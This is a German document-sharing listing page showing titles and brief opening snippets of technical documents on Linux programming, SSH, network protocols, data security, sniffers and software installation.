Programmieren unter LINUX Eine Einführung Programmieren unter LINUX Eine Einführung 46. Weinheimer UKW-Tagung 2001, Weinheim Dipl-Ing. Erich H. Franke, DK6II Königsbach-Stein email: dk6ii@afusoft.de September, 01 Franke, E.H., DK6II; Programmieren

Mehr

bintec Workshop DIME Tools Copyright 8. November 2005 Funkwerk Enterprise Communications GmbH Version 0.9

bintec Workshop DIME Tools Copyright 8. November 2005 Funkwerk Enterprise Communications GmbH Version 0.9 bintec Workshop DIME Tools Copyright 8. November 2005 Funkwerk Enterprise Communications GmbH Version 0.9 Ziel und Zweck Haftung Marken Copyright Richtlinien und Normen Wie Sie Funkwerk Enterprise Communications

Mehr

Karlsruher Institut für Technologie

Karlsruher Institut für Technologie Karlsruher Institut für Technologie Lehrstuhl für Programmierparadigmen Sprachtechnologie und Compiler WS 2010/2011 Dozent: Prof. Dr.-Ing. G. Snelting Übungsleiter: Matthias Braun Lösung zu Übungsblatt

Mehr

Remote Tools. SFTP Port X11. Proxy SSH SCP. christina.zeeh@studi.informatik.uni-stuttgart.de

Remote Tools. SFTP Port X11. Proxy SSH SCP. christina.zeeh@studi.informatik.uni-stuttgart.de Remote Tools SSH SCP Proxy SFTP Port X11 christina.zeeh@studi.informatik.uni-stuttgart.de Grundlagen IP-Adresse 4x8 = 32 Bit Unterteilung des Adressraumes in Subnetze (Uni: 129.69.0.0/16) 129.69.212.19

Mehr

TimeMachine. Installation und Konfiguration. Version 1.4. Stand 21.11.2013. Dokument: install.odt. Berger EDV Service Tulbeckstr.

TimeMachine. Installation und Konfiguration. Version 1.4. Stand 21.11.2013. Dokument: install.odt. Berger EDV Service Tulbeckstr. Installation und Konfiguration Version 1.4 Stand 21.11.2013 TimeMachine Dokument: install.odt Berger EDV Service Tulbeckstr. 33 80339 München Fon +49 89 13945642 Mail rb@bergertime.de Versionsangaben Autor

Mehr

Protokolle. Konrad Rosenbaum, 2006/7 protected under the GNU GPL & FDL

Protokolle. Konrad Rosenbaum, 2006/7 protected under the GNU GPL & FDL TCP/IP: Standard Protokolle Konrad Rosenbaum, 2006/7 DNS - Domain Name System hierarchische, global verteilte Datenbank löst Namen in IP-Adressen auf Host hat einen primären Nameserver, der Fragen selbst

Mehr

Datensicherheit. Vorlesung 7: 29.5.2015. Sommersemester 2015 h_da. Heiko Weber, Lehrbeauftragter

Datensicherheit. Vorlesung 7: 29.5.2015. Sommersemester 2015 h_da. Heiko Weber, Lehrbeauftragter Datensicherheit Vorlesung 7: 29.5.2015 Sommersemester 2015 h_da Heiko Weber, Lehrbeauftragter Inhalt 1. Einführung & Grundlagen der Datensicherheit 2. Identitäten / Authentifizierung / Passwörter 3. Kryptografie

Mehr

English. Deutsch. niwis consulting gmbh (https://www.niwis.com), manual NSEPEM Version 1.0

English. Deutsch. niwis consulting gmbh (https://www.niwis.com), manual NSEPEM Version 1.0 English Deutsch English After a configuration change in the windows registry, you have to restart the service. Requirements: Windows XP, Windows 7, SEP 12.1x With the default settings an event is triggered

Mehr

Scanner, Sniffer und Scanlogger

Scanner, Sniffer und Scanlogger Scanner, Sniffer und Scanlogger Sniffer Sniffer Grundlagen Promiscuous Mode Ethernet Gefahren und Nutzen von Sniffer Praxis mit Buttsniff und Sniffit Sniffer Grundlagen Ein Sniffer ist ein Device, ob Software

Mehr

Trend Micro Virtualisierte Rechenzentren absichern mit Deep Security

Trend Micro Virtualisierte Rechenzentren absichern mit Deep Security Trend Micro Virtualisierte Rechenzentren absichern mit Deep Security Ferdinand Sikora Channel Account Manager Etappen der Virtualisierung Stage 1 Server Virtualisierung Stage 2 Erweiterung & Desktop Server

Mehr

TimeMachine. Time CGI. Version 1.5. Stand 04.12.2013. Dokument: time.odt. Berger EDV Service Tulbeckstr. 33 80339 München

TimeMachine. Time CGI. Version 1.5. Stand 04.12.2013. Dokument: time.odt. Berger EDV Service Tulbeckstr. 33 80339 München Time CGI Version 1.5 Stand 04.12.2013 TimeMachine Dokument: time.odt Berger EDV Service Tulbeckstr. 33 80339 München Fon +49 89 13945642 Mail rb@bergertime.de Versionsangaben Autor Version Datum Kommentar

Mehr

Embedded-Linux-Seminare. Linux als Betriebssystem

Embedded-Linux-Seminare. Linux als Betriebssystem Embedded-Linux-Seminare Linux als Betriebssystem http://www.embedded-linux-seminare.de Diplom-Physiker Peter Börner Spandauer Weg 4 37085 Göttingen Tel.: 0551-7703465 Mail: info@embedded-linux-seminare.de

Mehr

SYNerity Analyse von Unix-Rechnern

SYNerity Analyse von Unix-Rechnern Analyse von Unix-Rechnern 1 Unix, aha!... Welches genau? Linux BSD Solaris HP-UX True64 AIX Unix-Analyse Online 2 Willkommen in Babylon Jeder Unix-Dialekt hat andere Befehle bzw. eigene Switches Dokumentation

Mehr

Mapbender-Installation

Mapbender-Installation Foswiki > NUMIS Web > TechniSches > InGridInstall > MapbenderInstall (2010-10-29, MartinKlenke) Mapbender-Installation Mapbender-Installation Basis-Software phppgadmin Webserver Postgres / Postgis Mapbender-Installation

Mehr

Grundlagen zur nebenläufigen Programmierung in Java

Grundlagen zur nebenläufigen Programmierung in Java Grundlagen zur nebenläufigen Programmierung in Java Karlsruher Entwicklertag 2013 5. Juni 2013 Referent: Christian Kumpe Inhalt des Vortrags Was zeigt dieser Vortrag? Ein einfaches Beispiel mit allerlei

Mehr

Installation von VirtualBox und phpvirtualbox auf Eisfair-1

Installation von VirtualBox und phpvirtualbox auf Eisfair-1 Installation von VirtualBox und phpvirtualbox auf Eisfair-1 Dieses HowTo beschreibt die Installation und Inbetriebnahme von VirtualBox 1 und phpvirtualbox 2 auf einem Eisfair-1 Server mit Kernel 3.2.54

Mehr